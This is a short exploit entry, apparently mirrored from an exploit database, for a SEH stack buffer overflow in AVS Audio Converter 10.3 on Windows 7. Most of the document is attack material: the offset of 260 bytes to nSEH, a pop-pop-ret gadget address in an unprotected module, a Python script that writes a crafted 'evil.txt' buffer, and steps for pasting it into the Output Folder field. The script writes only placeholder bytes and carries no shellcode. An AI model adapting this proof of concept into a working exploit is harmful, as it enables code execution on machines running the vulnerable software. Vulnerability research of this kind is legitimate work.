Share
## https://sploitus.com/exploit?id=PACKETSTORM:169427
# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)  
# Discovered by: Yehia Elghaly - Mrvar0x  
# Discovered Date: 2022-10-16  
# Tested Version: 10.3.1.633  
# Tested on OS: Windows 7 Professional x86  
  
#pop+ret Address=005154E6  
#Message= 0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe]   
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)  
  
# The only module that has SafeSEH disabled.  
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |   
# 0x00400000 | 0x01003000 | False | False | False | False | False |  
  
#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.  
  
#Buffer = '\x41'* 260  
#nSEH = '\x42'*4  
#SEH = '\x43'*4  
#ESI = 'D*44' # ESI Overwrite   
  
#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44  
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44  
  
  
# Rexploit:  
# Generate the 'evil.txt' payload using python 2.7.x on Linux.  
# Open the file 'evil.txt' Copy.  
# Paste at'Output Folder and click 'Browse'.  
  
#!/usr/bin/python -w  
  
filename="evil.txt"  
  
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44  
  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()